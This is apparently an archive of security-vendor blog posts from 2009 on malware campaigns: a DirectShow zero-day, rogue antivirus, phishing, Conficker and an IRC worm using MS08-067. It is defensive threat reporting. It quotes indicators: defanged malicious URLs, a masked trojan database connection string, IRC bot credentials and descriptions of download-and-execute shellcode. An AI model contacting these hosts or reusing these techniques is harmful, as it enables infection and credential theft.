At McAfee we detect this variant as W32/Koobface.worm.gen.e and W32/Koobface.worm.gen.h. The detection for this variant will be available to the public in today’s release (DAT 5675).

In our blog from yesterday, we described how Exploit-MSDirectShow.b has been widely deployed on hijacked websites in China, targeting Internet Explorer users. When a victim browses one of these sites, malware is downloaded to the computer. To better understand the current impact of these attacks, we have monitored the prevalence of its downloaded malware through Artemis.

Since yesterday, our Artemis technology has detected new malware installed by Exploit-MSDirectShow.b that was targeted to certain geographical regions of the world.

In China, a new sample variant was queried by Artemis more than 180 times at more than 70 unique IP addresses (ISP, not end point) over a 24-hour period. This is represented by the many red dots in the following figure:

This particular sample was first seen only in mainland China, but we soon saw Artemis queries from Korea, Japan, Australia, Singapore, Taiwan, and the United States in very small numbers. As we know, the web has no boundaries and the potential risks of the DirectShow zero-day vulnerability is not limited to specific languages or regions. We will closely monitor this trend.

This sample is already heuristically detected in the DATs and Artemis. After our analysis, it has now been classified as Downloader-BRT Trojan.

Since we reported about the new attacks against Internet Explorer exploiting a vulnerability in a DirectShow ActiveX object, we have released DATs/coverage updates for many of our products and technologies.

Current status for each of the content areas:

• Malware: Coverage is provided for exploit code in the 5668 DATs, released on July 6
• HIPS: Generic buffer overflow should provide coverage
• McAfee Network Security Platform: Coverage was provided on July 6
• McAfee Vulnerability Manager: Coverage was provided on July 6
• MNAC: Coverage will be provided in the next release
• VirusScan Enterprise: Buffer overflow protection should provide coverage
• McAfee Web Gateway, Anti-Malware Edition: Behavior analysis provides coverage against currently known exploits

Other Internet users and website administrators can also download the free Stinger tool to scan computers and web pages for known malware relating to this attack:

• http://download.nai.com/products/mcafee-avert/stinger.exe

We will continue to monitor the situation to provide comprehensive coverage.

If you read Geok Meng and Xiaobo’s blog published in December last year, this must almost seem like a movie sequel. Over the July 4 weekend, an exploit targeting a zero-day vulnerability in the Microsoft Microsoft DirectShow ActiveX object was widely discovered on many Chinese websites.

At the time of research, over a hundred hijacked sites were found to be injected with malicious links that are still actively hosting this Trojan. Many of these sites are what you and I would not consider “malicious” or “dodgy.” For example, some of them are school websites or the local community club’s website that had been hijacked or infected.

When browsing these sites (hijacked site #1), the victim is hyperlinked to hijacked site #2, which seems to act as a proxy. In this case, if someone were to audit the source code of hijacked site #1, he or she would see that the links are connected to sites that look legitimate. Hijacked site #2 is, subsequently, hyperlinked to a malicious site hosting a web exploit toolkit.

During research, one of the things we found interesting was the web exploit toolkit explicitly checks that the origin of the hyperlinked references do not come from the “.gov.cn”  and “.edu.cn” domains, which are used by Chinese government and education sites, respectively. If the references are not coming from any of these domains, it starts sending a cocktail of exploits including:

• Exploit-MSDirectShow.b (zero-day)
• Exploit-XMLhttp.d
• Exploit-RealPlay.a
• JS/Exploit-BBar
• Exploit-MS06-014

Each of these exploits targets a different application that could be vulnerable–Internet Explorer 6 and 7, DirectShow ActiveX, RealPlayer, Baidu Toolbar–that can be accessed via the Internet Explorer browser.

From past investigations, this toolkit has been widely used on many Chinese hijacked sites this year. The attackers may be trying to avoid or delay attention from the Chinese government.

When successful, the attacker installs a downloader Trojan that could download other malware.

This zero-day vulnerability has been verified to affect at least Windows XP systems with Internet Explorer 6.x and 7.x. However, on IE 7, the browser on Windows Vista systems, risky ActiveX objects are blocked by default, which may mitigate this zero-day attack. Users should ensure that their systems are always kept up to date against the older exploits.

The zero-day exploit will be detected as Exploit-MSDirectShow.b by McAfee VirusScan in today’s 5668 DATs. The downloader Trojan installed by this exploit can be proactively detected as Generic.dx since the 5567 DATs (released March 28).

We will post more information as we receive it.

(Thanks to our colleague Wei Wang for assistance in this analysis.)

The announcement of Michael Jackson’s death has caused immediate effects on the Web 2.0 world. The impact ranged from the interruption on Facebook of coverage of Farrah Fawcett’s death to a surge experienced by Twitter. The Web 2.0 world is definitely abuzz with traffic regarding his passing.

Within hours the percentage of “long-tail” URL traffic associated with Michael Jackson was growing. It peaked around 1 p.m. Eastern time today and now seems to be dropping. These URLs contained mostly generic information about Jackson–blogs, posts, tributes, photos, and collections of his entertainment past. And, yes, some even contained links to malware or rogue anti-virus software.

How do people find these URLs? We’ve seen spam, tweets, blog postings, group postings, and even mobile phone alerts. In addition, as predicted by Avert Labs, we’ve seen search-engine optimization (SEO) in action. There were several attempts to capitalize on redirecting users to known malware-serving sites associated with other SEO campaigns. We found it interesting during our research to see how fast some of the search engines seemed to respond to this. One popular keyword search done around 9 p.m. yesterday showed seven of the top 10 links going to some of these well-known malicious servers. That same search done an hour later showed only one of the top 10 involved.

As the entertainment industry continues to pay tribute and homage to Jackson, we expect that spam and SEO efforts will grow over the weekend. Eventually a new piece of news will replace this event, and there will be a new story–with much the same results.

With the current news about the deaths of Farrah Fawcett and Michael Jackson, it’s a good idea to remind our readers to beware of blackhat attempts to distribute malware to anyone looking for news.

Every time a disaster happens or news about some celebrity reaches the media, malware writers try to take advantage of it. The most common attack vector is email. Watch out for spam offering links to “news” or “pictures” of deceased celebrities. Most of the time, they will take you to websites offering advertisements for pharmacy products such as Viagra and Cialis or, even worse, will try to install malware on your machine!

But another way to attract visitors looking for news is a technique known as search engine optimization (SEO for short, see more here). Blackhats use SEO to inflate search engine results in an attempt to put their results on top of the list and drive more users to fake websites offering “more information” about the current trendy news. When the users click on the fake links, they are susceptible to any kind of attack, spyware or malware installation, or information theft.

A good way to protect against this kind of attack is to use our SiteAdvisor tool, which can be downloaded for free at this site: http://www.siteadvisor.com/. It will help you identify potentially malicious links on your search results.

And again, repeat with me: No, that email will NOT show you pictures of Michael Jackson’s body; it will just install malware on your machine.

With the advent of Web 2.0, social networking websites have become an easy target for online fraud and other identity scams. Lately, we have seen Twitter being used to phish out personal information, as well as MySpace scams and Facebook spams.

With more than 15 percent of the traffic from India, Orkut is perhaps the most popular and widely used social networking website in the country. Phishers have come up with an elegant approach to social-engineer the not so tech-savvy users on Orkut. They have updated the user profiles of several thousands of compromised Orkut accounts, which now link to various phished websites. These lure visiting users into divulging their personal information.

Various phished websites claim to be the “adult” variant of Orkut. The “Orkut Sex” site has been very successful in luring several thousands of Orkut users into entering their credentials into this fake website. The attackers use the harvested details to steal other personal information for monetary gain.

We have observed scores of websites being used in this phishing attack. Here are a few of them:

• http://orkutsexlogi[blocked].tk
• http://s3x[blocked].kilu.de
• http://orkutst[blocked].tk
• http://album[blocked].kilu.de
• http://priya[blocked].freehostia.com

If you have read this far, I probably don’t need to remind you to look carefully before you enter your personal details on the web. Always make sure that you are safe and protected–and keep away from the rip-offs.

Most every day I see AutoRun worms such as this one. You may know the kind, the worms that are designed to replicate onto removable drives. There is certainly no shortage of these little monsters.

Often the worm, although problematic itself, is just the harbinger of potential doom. More malicious malware obtained by these worms can lead to full-blown havoc–or, at a minimum, a very bad day.

So I was thinking of potential new vectors when it hit me–there are a few right under our noses that some people just might overlook. A kind of “can’t see the forest for the trees” scenario.

Here’s a little quiz: Which of the following devices may be susceptible to AutoRun worms?

A) Most USB devices that you can plug into your computer that have storage

If you answered A, you’re right! (That wasn’t hard, was it?)

How many of you have an MP3 player? How many of you plug the device into more than one computer? Bingo, that’s a vector for replication.

How about a digital video camera, or a digital picture frame? Yep, they can also be infected. Just imagine this one: “Here you go grandma, a picture of little Bobby. Oh, and a little surprise to go with it, as well.”

Now, the truly paranoid (or truly cautious?) administrators have been known to swab glue into the USB connectors so that they seal off access completely. This may not be the best way to solve the problem (think disabling AutoPlay, up-to-date antivirus, enabling a firewall, etc.).

But going down the road to prevention, however, is not the point I’m trying to make. There is already a myriad of advice on the Internet for that. All I am trying to say is that the spread of AutoRuns can go beyond the USB drives we all use to conveniently move stuff around. Devices such as MP3 players are just glorified storage drives with additional functions. One unintended aspect of this functionality may be to assist in worm propagation.

Hopefully, you do already think about these devices as a legitimate way to pass along a worm. In that case, maybe the most you got out of this little blog was some lighthearted entertainment (or at least a break from whatever you were doing).

If you haven’t thought about this vector, though, I urge you to start now and to proceed with caution the next time you are going to offload and share that video, or grab the latest hit song.

That way you can say, “Hold the side of ‘autorun.inf’ with my music, thank you very much.”

I don’t really know which is worse: a dumb or a smart malware writer.

Brazilian malware writers fall into the first category: bad coders and dumb. It’s as simple as that.

While checking a very recent PWS-Banker Trojan (the malware that steals banking information), I came across a variant. This one targets three Brazilian banks–Bradesco, Itau, and Real–to steal the basic information: bank account, branch office, user, password, and paper token info.

Next this malware sends the information to a remote SQL database. Nothing new to see here because password-stealing trojans have been around for several years, but what struck me in this case is that the malware author didn’t think about protecting the information he gathered (stole), since all the credentials to access the remote database are hardcoded inside the malware.

Provider=SQLOLEDB.1;Password=XXXXXX;Persist Security Info=True;User ID=YYYYY;Initial Catalog=YYYYY;Data Source=sql.[removed].com.br;Packet Size=10000

What does this mean? It was bad enough that someone gained access to the victims’ bank info, but now any person who checks the malware can also have access to that data! And by “checking” I do not mean it requires any reverse engineering.

Yes, it is just another password-stealing Trojan. No need to get too excited. And, yes, we already detect this malware–as PWS-Banker.gen.i.

Yesterday, we came across to a new variant of a rogue security program. This one is called Malware Doctor, and we detect it as FakeAlert-D Trojan  with our DAT 5635.

The new variant comes from the following web pages:
hxxp://internetware-sa{blocked}.com/
hxxp://mal-ware{blocked}.net

As do most other rogue security programs, Malware Doctor displays misleading fake alerts to entice users into buying a product to “repair” malware problems.

We also noticed some new features in Malware Doctor. Once installed, it performs a system scan:

Users see a message indicating this “unregistered” version of Malware Doctor won’t be able to heal or remove infected files and asking the user to activate it at a cost.

Unlike many rogue security programs, which displays excessive fake alerts, this version of Malware Doctor reports only few detections so users will not be very suspicious of it.

Once this Trojan detects a supposedly malicious file, it will pop up a message:

This Trojan even makes use of McAfee’s malware naming convention:

This Trojan also displays information of supposedly known viruses whose information is taken from McAfee’s Virus Information Library.

As of today, the malicious website hosting this Trojan makes use of another AV vendor’s malware naming convention. However, the installer for this Trojan no longer exists on the Trojan’s website.

Affected VirusScan users may remove this threat using the latest DATs and engine.

Keep your AV signatures up to date!

Today we at McAfee Avert Labs released an excellent paper on browser attacks. Written by Christoph Alme, this paper deals with the many complexities of browser security and attacks. From the paper:

Web Browsers: An Emerging Platform Under Attack
“The widespread use of highly interactive “rich client” web applications for e-commerce, business networking, and online collaboration has finally catapulted web browsers from straightforward HTML viewers to a full-blown software platform. And as corporate users are performing a significant portion of their work on the web, whether it’s researching or collaborating, the safety of the underlying platform is critical to the company’s success. ”

Other areas the paper covers include:

• The shift in spam to mainly malicious web link usage

• “Web 2.0” sites—whether weblogs, social networking or portal sites—are increasingly spammed with links to malicious sites

• Legitimate sites are compromised and misused to either host malicious code or link to a malicious website

• Use of malicious video banners placed in advertisement networks

• Use of popular search terms to advertise and drive (search query) traffic to a malicious website. In a recent case in Germany, attackers used Google AdWords to attract users who searched for “flash player” to the attacker’s fake Adobe-look-alike site

Download the paper in its entirety here.

Today we released our Spam Report for the month of June. In it we discuss two key findings:

President Obama’s First 100 Days of Spam
Although you might imagine the change of administration in the United States would have a major impact on the Internet, the first 100 days of Obama’s presidency were mostly business as usual in the spam world.

Identifying Spam Trends of the Future
Even though we’ve been told to avoid clicking such links to prevent spammers from learning who we are, many of us forget to be vigilant because the overall detection accuracy of anti-spam products has improved. Recipients may instantly distrust an executable attached to an email, but they often feel unthreatened by a short blurb and a URL.

What does the future of spam hold for us? Spam is all about making money and, as with most businesses, spammer CEOs need to worry about costs and their bottom lines. As long we continue to behave as suckers, spammers will use sophisticated tactics to separate us from our money. Download the full report here.

It is ironic, but the rapid growth rate of malware attacks is partly due to how successful AV technology has become. If AV scanners were not so successful in blocking Trojans and viruses, there would be little need for the bad guys to write new ones. One can even say that malware writers are digging an elephant trap for all computer users because lots of new malware demands a response from AV, which can contribute to the slower operation of computers for all of us.

Figuratively speaking, the primary tools that the bad guys are using to dig their side of the trap and evade detection are packers (like UPX and Petite) and protectors (like Armadillo and Themida). Packers are legitimately used to reduce the size of programs (saving disk space), while protectors are legitimately used to prevent patching, hacking or reverse engineering. For malware production, however, packers and protectors are useful as they can often obfuscate original malware beyond recognition by AV.

Commercial protectors are especially loved by malware writers because they can put a protective envelope on top of, say, their spam-bot and it will be well hidden inside. Additionally, it will now really look more like a legitimate file obfuscated with the same protector. Malware writers use this trick more and more frequently.

As a result, on any average computer, AV can frequently encounter, say, a Themida-packed computer game and a Themida-packed spam-bot. To determine what is what an AV product has to know what is “under” the protecting envelope. Unfortunately, this simply cannot be done very quickly. It takes computing cycles…..

We would urge all developers who use software protection to think twice before doing so. There is an increasing risk that your legitimate files will be blocked by AV software by mistake or that there will be an unpleasant slowdown due to long analysis. Either can cause troubles for users. If you feel that you really must use an obfuscating protector at least digitally sign your files. That would reduce the level of suspicion by introducing traceability to the source.

The point is that software protectors are just not a secure software technology any longer because they have been misused so much. Do not use it if you can avoid it.

A distributed denial-of-service (DDOS) attack on DNS servers of a domain registrar coupled with bad program logic in a popular media application caused network outages in parts of China last week.

Baofeng is a widely popular media player in China, with a total of 200 million users and several million users online simultaneously. The player starts when Windows boots and connects to Baofeng’s online server; then it’s designed to send DNS queries to DNS servers to get the IP addresses of different online servers until it gets an answer. Because of its massive number of online users, it would be a powerful DDOS attack tool if all online Baofeng programs were to send continuous DNS queries at the same time, especially if the authoritative DNS server could not answer the queries.

Several DNS servers of DNSPod (a Chinese domain service provider and registrar) were hit by a DDOS attack on the night of May 18. These DNS servers became inaccessible. The assault was meant to be a targeted attack against one company, but one of the customers of DNSPod is Baofeng.com, whose authoritative DNS server was the server under attack. Because of a design flaw in Baofeng’s media player, all online Baofeng programs started continuously sending DNS queries after the DNS responses previously cached by other servers timed out on May 19. The massive number of DNS queries flooded the network of China Telecom (one of the biggest ISPs in China). As a result, users in parts of China were unable to access websites.

The initial DDOS attack that targeted a specific domain registrar now transformed into a DDOS attack on almost all DNS servers in China, so we can see how a bad design in a program “helped” the attacker(s) amplify the attack.

Supervisory Control and Data Acquisition, or SCADA, stands for large-scale distributed remote processing systems that gather data in real time to control critical industrial, infrastructure, or facility processes and equipment. SCADA is used in power plants as well as in oil and gas refining, telecommunications, transportation, and water and waste control.

Stories about intruders who damage the power grid or any other key SCADA infrastructure frequently make the headlines. In the past, and like in Mexico in 2007, extraterrestrial creatures and flying saucers were occasionally blamed.

Since then, our enemies have changed. The Wall Street Journal reported in April that a federal audit of critical infrastructure facilities in the U.S. power industry had been compromised with software that would allow the attackers to disable key elements of the national power grid. “The Chinese have attempted to map our infrastructure, such as the electrical grid,” a U.S. senior intelligence official said on the occasion. One year ago, the CIA claimed that a cyberattack had caused a multicity power outage at an unspecified location outside the United States. The CIA story broke on May 14. It’s rumored that Hydro-Quebec was also a target of cyberspies.

Last week, I discovered a video posted on YouTube in November 2008.
We can see two guys hacking a central light system and then playing space invaders on it!

I have some doubts about the technical aspects of these light-show “attacks” on unprepared buildings. But fake or not, the video confirms that hackers and cybercriminals have got their eyes on SCADA networks. Perhaps the first demo was just for fun, but the others will have less juvenile goals. An attack can involve nationwide damage, a terrible effect on the public’s morale, and huge financial losses. Modern SCADA networks are more vulnerable than ever because they use open networking standards (such as TCP/IP), are now deployed under less secure operating systems (Windows), are connected to other networks (including Internet), and cannot be easily updated and rebooted.

For SCADA, which typically allows only a closely defined list of applications to run, a security approach that includes whitelisting can be a good solution. McAfee’s recent acquisition of Solidcore will help our customers in this area.

Today we launched a new web film series, entitled “H*Commerce: The Business of Hacking You.” The film series was created to expose cybercrime as a serious and universal threat that can no longer be ignored. Several of our own Avert Labs researchers lent a hand and their big ol’ brains to the project!

The term H*Commerce (or Hacker Commerce) is defined as the business of making money through the illegal use of technology to compromise personal and business data. Starting today, a new episode will be posted every two weeks here until all six episodes have aired.

The project was originally conceived as a series of standalone episodes, each focusing on different aspects of cybercrime: such as phishing, denial-of-service attacks, online scams, bank scraping, and fraudulent emails. As the filmmakers dug deep into the experience of H*Commerce victims, they realized the film’s focus had to be on the complex stories of real people doing normal online things, only to be horribly violated by ruthless cybercriminals.

Seth Gordon, director of films such as the 2008 theatrical release of “Four Christmases,” and the documentary “The King of Kong–A Fistful of Quarters,” was hired to direct “H*Commerce: The Business of Hacking You.” As Gordon began the research phase of the film, he identified an Oregon woman named Janella Spears, who was a victim of one of the largest and most elaborate email scams on record.

Spears’ story of losing more than $440,000, and the dire effects it had on her family and marriage, became the central theme of the film series. Over the course of the filming, Chris Roberts, a third-party cyberforensic expert, was introduced to Ms. Spears to provide advice on how to clean her system, handle the hackers, and help put an end to the cybercrime scams.

Watch, learn, and arm yourself with knowledge. Check it out at Stop H*Commerce.

In March 2009, we notified our customers on a new variant of the infamous Vundo trojan family which we detected as Ransom-F and raised its risk assessment to a Low-Profiled threat.  It was possibly the first indicators of a shift in the FakeAlert criminal model from instilling fear, to holding information technology resources for ransom but certainly not the last.

Last week, we came across to a new variant of a rogue security program branded by its creators as “System Security 2009″ and detected them as FakeAlert-CO, and some of its past similarly branded cousins as FakeAlert-SystemSecurity.

The updated variants were discovered from a web page hosted on trustedw{blocked}security.com.As most other rogue security programs to date, FakeAlert-CO displays spurious alerts and making fraudulent claims of infections that requires the user to pay a fee to “repair”. Following the trend of Ransom-F, we noticed “new features” in FakeAlert-COthat resembles some common characteristics of ransomware trojans.

Once installed, FakeAlert-CO may either terminates all running user process or prompts the user to reboot.

In either cases, it follows to pretend to perform a system scan and report detections of false and exaggerated threats.

What differs it from older variants, is that the user will no longer be allowed to open or execute any applications including Task Manager, Command Prompt or other system and office applications which are terminated by FakeAlert-CO. A message is displayed to the user to indicate that the files are infected and to resolve the issue, the user must activate FakeAlert-CO at a cost.

The “product” website is made to look fairly professional offering an option to purchase a 2-year license, or lifetime support license at a “discount” and even comes with 30-day money back guarantee!

You may be paying for the “best” possible support option, but you can’t trust a “product” that holds your system for ransom.

Uninstalling the System Security “product” will not be an option for the typical user, as there is neither an uininstaller function nor will the “Add or Remove Programs” in the control panel be allowed to be opened via the usual means.

However, the reported infected files are intact, and are not modified in any way. If the user boots into Safe Mode, FakeAlert-CO is not started automatically and system tools and applications can be executed and accessed normally.

Affected VirusScan users may remove this threat using the latest DATs and engine.

Today McAfee Avert Labs released its Threats Report for the first quarter of 2009. In it we reveal that cybercriminals have taken control of almost 12 million new IP addresses since January, a 50 percent increase since 2008. The United States is now home to the largest percentage of botnet-infected computers, currently hosting 18 percent of all zombie machines. Seems the bad guys are attempting to recover from last November’s takedown of a central spam-hosting ISP by rebuilding their army.

Other Key Findings

The Koobface virus has made a resurgence, and more than 800 new variants of the virus were discovered in March alone.

Servers hosting legitimate content have increased in popularity with malware writers as a means for distributing malicious and illegal content.

Cybercriminals are increasing their use of URL redirects and Web 2.0 sites to disguise their locations.

Compared with the overall landscape, the Conficker worm represents a small subset of all threat reports. AutoRun malware, on the other hand, represented 10 percent of reported detections during the first quarter–quite a bit more than Conficker itself.

You can find the full text of the “McAfee Threats Report: First Quarter 2009″ here.

On April 30, an exploit targeting a zero-day vulnerability in the Baofeng media player was published on the Internet. The proof-of-concept exploit had more than enough details for others with malicious intent to create more malicious variants.

Baofeng is a widely popular media player in China, and it plays many common media file formats. May 1 to 3 was the May Day weekend in China. One can imagine many Chinese users surfing the net or searching for their favorite video clips could be hit by this vulnerabililty during the holidays.

Because this vulnerability exploits an ActiveX component, attackers may inject malicious code via common means such as SQL exploits, or they can simply upload malicious web content onto certain websites. Once users browse these web pages, attackers may execute arbitrary code on the users’ computers via the flawed ActiveX component.

Currently, the vendor has confirmed this flaw and the following versions are reportedly affected by this vulnerability:

•  Build versions: 3.09.03.30，3.09.03.25，3.09.04.17，3.09.04.27.

A patch has been released for this vulnerability. Affected users should immediately contact the vendor for the security update.

McAfee VirusScan has proactively detected this exploit as the JS/Exploit-BO.gen Trojan since as early as the 4679 DATs (January 20, 2006).

Today I came across a program that claims to be an installer for the VLC media player. Innocent, right? Guess again. For starters, the installation file was different from that supplied by the legitimate VLC media player site.

At Step 3 of the installation I saw this dialog box:

The translation of the message from French is, “HELP US IMPROVE OUR SERVICE. To obtain your activation code call [number removed]. To receive your code in SMS send the keyword CODE to [number removed].” This is a case of SMS fraud!

As usual, we shouldn’t install programs from sources that we don’t trust. In our case, we know from Step 3 of the installation that we’re dealing fraudsters. So why continue with the installation?

We detect this Trojan as Ransom-E, updated in the 5597 DATs.

LuckySploit is an exploit framework that’s been in the news recently. As drive-by-downloads go, it lurks behind iframes and foists malware upon unsuspecting users.

One LuckySploit attack we analyzed downloaded the FakeAlert-BY Trojan. So if you visited a Web site today then saw this…

… then you are, unfortunately, infected with FakeAlert-BY, and possibly thanks to LuckySploit.

We detect the LuckySploit downloader as JS/Downloader-BNL in the 5580 DATs, to be released on April 10. We’ve had detection for FakeAlert-BY  since the 5545 DATs, released on March 6.

Please update your AV signatures and stay secure!

Microsoft recently reported a new worm found to be exploiting the MS08-067 software flaw in the wild.  Even though our products already detected it generically as W32/IRCbot.gen.a, we decided to take a closer look and make sure we proactively detect all components that the worm might be dropping or downloading.

When run, W32/IRCbot.gen.a copies itself to <system folder>\netmon.exe.  It then drops a rootkit as <system folder>\drivers\sysdrv32.sys (MD5: 0e219b74e2c68a34ca09d8fe114f6d11) and hooks the Windows tcpip.sys driver to remove the outbound connection limits in Windows XP Service Pack 2 and newer. We successfully detect this rootkit as Generic Rootkit.g trojan.  It then follows to establish an outbound connection with a remote IRC server using following credentials:

• PASS h4xg4ng
• NICK [00-USA-XP-9215671]
• USER SP2-ojd, followed by the name of the infected computer.

This worm exploits the MS08-067 vulnerability indeed, and uses a download-and-execute shellcode which behaves in an identical fashion as Conficker’s exploit, with only some differences in implementation. It is encoded using a simple 1-byte XOR key and looks like any other standard PEB shellcode which loads API libraries (i.e. urlmon.dll) and executes URLDownloadToFile() to download malware from already infected systems into new targets. Unlike Conficker which injects a downloaded DLL into running Windows processes, this worm downloads and installs a 66.scr executable file instead.

As mentioned, the Conficker worm uses an exploit derived from the “ms08_067_netapi” Metasploit module to spread itself.  The Metasploit framework has become a popular platform for security tools development and automation. As we can see, the latest version of Metasploit is not only used by whitehatsfor vulnerability assessments and penetration testing, but also for malware development. The W32/IRCbot.gen.a worm is not an exception, it has remote language detection taken from Metasploit’s “smb_fingerprint()” routine implemented in the “smb.rb” module, as well as dcerpc service connection testing code located in the “client.rb” module. By using these routines,  new worm can conveniently determine which operating system and service pack it is targeting to achieve a better infection success rate. The way how W32/IRCbot.gen.a ordered the attack packets is identical to Metasploit’s MS08-067 module  (ms08_067_netapi.rb):

Both Conficker and W32/IRCbot.gen.a uses open source tools similarly to their advantage to make their work much easier.

We went on to investigate additional sites where the worm is connecting to and the payload that it is trying to download. Packet sniffer logs shows that it accesses at least two other remote servers:

• hxxp://98.1[infected].42:443/n
• hxxp://74.2[infected].90:88/jueo.exe

While the first server is not showing any technical activity at the time of research, the second server is still active and hosts additional malware that is installed into infected machines:

Well, hello Donbot ! Upon investigation, the downloaded malware (MD5: 916DB2E2C2D1ED7AF89DD8EBB9C7D84C) detected generically as Generic.dx appears to be a component of an active botnet called Donbot (also known as Bachsoy). Components of Donbot typically create a proxy on infected machines and may be used to relay spam and HTTP traffic. Except for a few, most AV vendors seem to have detection for this malware.

Until recently, Donbot has been a relatively minor player in the lucrative spam business, but it certainly looks like the Donbot authors have decided to expand the potential of their botnet . While other botnets – namely Cutwail and Rustock continue to dominate the distribution of spam, Donbot is making an eager attempt to get a bigger share of the spam revenue pie as one of the top 5 most active botnets worldwide. Clearly, worm authors are focusing on growing their botnets as they might not get another chance like the MS08-067 exploit in a long time.

This would also serve as yet another reminder that there could well be many computers on the Internet that are still not installed with the latest security updates - more than 5 months since the release of the MS08-067 patch.

Have you ever read an article on the web where you just had to Google a certain term or phrase to learn more about it, or even just to satisfy your own curiosity? The answer is likely yes, and it’s probably a frequent occurrence. That’s what malware distributers have figured out. Here’s an example. A news article about disgraced financier Bernard Madoff made mention of his 55-foot yacht; a 1969 Rybovich. Wow, I bet that’s a spectacular yacht. If you wonder what one looks like, perhaps you might do a quick search for “1969 Rybovich.” One may think such a casual search would be harmless. Think again. It turns out Malware distributors have honed in on the yacht phrase and the top Google results are malicious URLs. We first noticed this on the evening of April 1 when we first read the story and were curious – and our first take was “Wow, they are fast”.    We watched the evolution of the number of google results that presented malware over the course of April 2. The last we checked – even one of the blogs off of my.barackobama.com was utilizing this yacht to lure users.

The search results don’t look so threatening, but if you are to click on the first few URLs, you’ll find differently. Each of these URLs is a rouge anti-virus URL that will distribute malware. Here are a couple of examples…

These two examples should arouse suspicion by now, especially if you’re looking for yachts, but anyone acting in haste, or succumbing to further curiosity will be taken to the malware delivery upon clicking where prompted, and frequently it’s already been delivered even if you don’t click.

This example is quite typical of what you’ll see next when you click, a fake malware scan that delivers the malicious goods. It looks just like an MS scanner!!!

So what about that 1969 Rybovich? What about further curiosity based Googling? Next time you find yourself conducting such a search, do so with caution. Consider if the search result URLs all look similar. In this case, that is first red flag of caution. When you click to go to a link; does the content look like what you expected or is there some unexpected prompt to click? This is red flag number two. One shouldn’t even proceed onto red flag number three to see the fake malware scan. Already you’re taking a dangerous path that is not going to show you anything about Madoff’s yacht.

We’ve just seen the Microsoft Excel 0-day attacks in February. Today, Microsoft published a new Security Advisory reporting a new unpatched vulnerability in Microsoft Office PowerPoint.

McAfee Avert Labs investigated and discovered multiple attacks in the field using the PowerPoint exploit. McAfee VirusScan products detects this threat as Exploit-PPT.k trojan using the 5573 DATs to be released on the same day. 

As with most other document exploits, these PowerPoint files install malicious trojans in the background but displays an innocent PowerPoint presentation to the victim as a deceptive measure. The following list shows a variety of malware files installed in these attacks:

• fssm32.exe: 428,032 bytes (Muster.c trojan)
• IEUpd.exe : 45,056 bytes (Muster.c trojan)
• setup.exe : 13, 1072 bytes (Muster.c trojan)
• PeerCM.exe : 80,666 bytes (Generic BackDoor.u trojan)
• ws2_42.dll :10,6740 bytes (Generic BackDoor.u trojan)

Some of these specially crafted exploits arrived as PowerPoint Showfiles with the “.pps” extension. Such files typically opens in full screen mode and hides the  applications running on the desktop such as system monitoring tools that could give any clue to the dodgy installation of trojans to the victim.

Please keep your DAT files up-to-date and refrain from opening any PowerPoint files from any untrusted sources until a patch is made available by the vendor. Where possible, verify with the sender to make sure what you get is what was intended.

A lot has already been written about Conficker. There had been excellent analysis reports published by SRI, The Honeynet Project and others. Vinay Mahadik and I would like to present some findings on the network aspects of the Conficker.C behavior. 

We setup a small testbed that had a machine infected with Conficker.C in a controlled environment; and another Linux box that was customized for packet mangling. This enabled us to intercept or mangle the packets exchanged between the infected machine and the outside world. We monitored the activity of the infected host over several days. We classify the test into two phases: Pre- April 1st and the April 1st phase.

During the Pre- April 1st phase we observed the following.

Conficker.C gets the current time from some of the popular websites. This involves sending a DNS query to the name server to resolve the IP address of the website which is followed by a HTTP GET request to that IP address. The below figure illustrates an attempt made to craigslist.org:

Conficker.C also sends UDP and TCP probes to locate its peers. We observed fairly aggressive and simultaneous UDP & TCP scans. The volume of the UDP scans was particularly high – roughly 2-3 UDP queries per second and seems to taper down as we got closer to April 1st. As most of the randomly generated IP addresses were not live or did not have the targeted ports opened, there were a large number of ICMP messages received – port unreachable , host unreachable, time-to-live exceeded.

“April Fooling Conficker.C”

In the April 1st phase, we intercepted and manipulated the HTTP date check query responses, so that for every website that Conficker.C queries, it gets a response with a date stamp of April 1st, 2009. The local system time was also set to April 1st. By controlling the only 2 date check sources, we managed to fool the malware into thinking it was indeed April 1st! Soon after, we observed numerous DNS queries for the generated domain names.

There were a few instances where Conficker.C did discover peers out there, and exchanged short UDP packets with them over several minutes. We were extremely curious about them.

Vinay Mahadik reverse engineered the 95+ conversations, across some 50K+ UDP peer discovery packets, and found some patterns in both the requests and responses. These patterns are valid for both the pre- April 1st and April 1st UDP scans. Based on this, we have incorporated a new heuristics into our latest Network Security Platform Signature set 5.1.16.15, or 4.1.46.16.

McAfee Network Security Platform (Intrushield) customers can observe the following alerts.

• WORM: W32/Conficker.C Activity Detected
• HTTP: Suspicious Time Check Detected

The figure below illustrates the alert viewer drilled down by a Source IP that has generated the “WORM: W32/Conficker.C Activity Detected ” alert.

 (Both Vinay Mahadik and Ravi Balupari have contributed to this research blog)

Hello, it is now April 1st for at least Asia Pacific and Europe. We’ve been blogging and posting various resources about ways to protect against the Conficker worm up to its “activation day”:

•  “More Comments Regarding Conficker“
•  “W32/Conficker: Much Ado About Nothing?“.

The day has finally arrived.

McAfee Avert Labs has been closely monitoring Conficker-related threats and, we haven’t observed any significant activities on the domains that it is polling for thus far. Even so, please remain vigilant and watch this space for any further updates to the current status.

On measures to protect yourself and your organisation against Conficker, please visit:

• http://www.mcafee.com/us/threat_center/conficker.html

In the run-up to April 1, the media spotlight around the latest Conficker worm variant has reached a morbid frenzy. From being touted as an “April Fool’s joke” to outrageous headlines such as “Millions of computers expected to be destroyed”–no other worm in recent history has generated this much media attention. But what have we learned from history? From the days of Michelangelo to the recent Blaster, SoBig, Sober, and Kamasutra worms, the hype surrounding the activation or payload dates of major Internet worms have turned out to be only damp squibs.

What happens on April Fool’s Day is anyone’s guess. Although we still don’t know the real intent of the authors of the Conficker worm, they have consistently improved the worm by adding new functionality and anti-debugging tricks with every released variant. In order to resist the Conficker Cabal initiative, which recently blocked domain registrations associated with previous Conficker A and B variants, the worm authors upped the randomly generated domain count from 250 to 50,000. The intent behind generating and attempting to contact so many domains is to make it extremely difficult for security researchers to monitor sites that could potentially host a payload for the Conficker worm to download and execute.

What we do know is almost all the security vendors have thoroughly analyzed Conficker–also known as Downadup and Kido worm–and have good generic detection and cleaning in place. Uploading a couple of randomly selected Conficker binaries to the VirusTotal site consistently shows an overall anti-virus detection rate of 90 percent or above. And these high detection rates are across vendors–small or big.

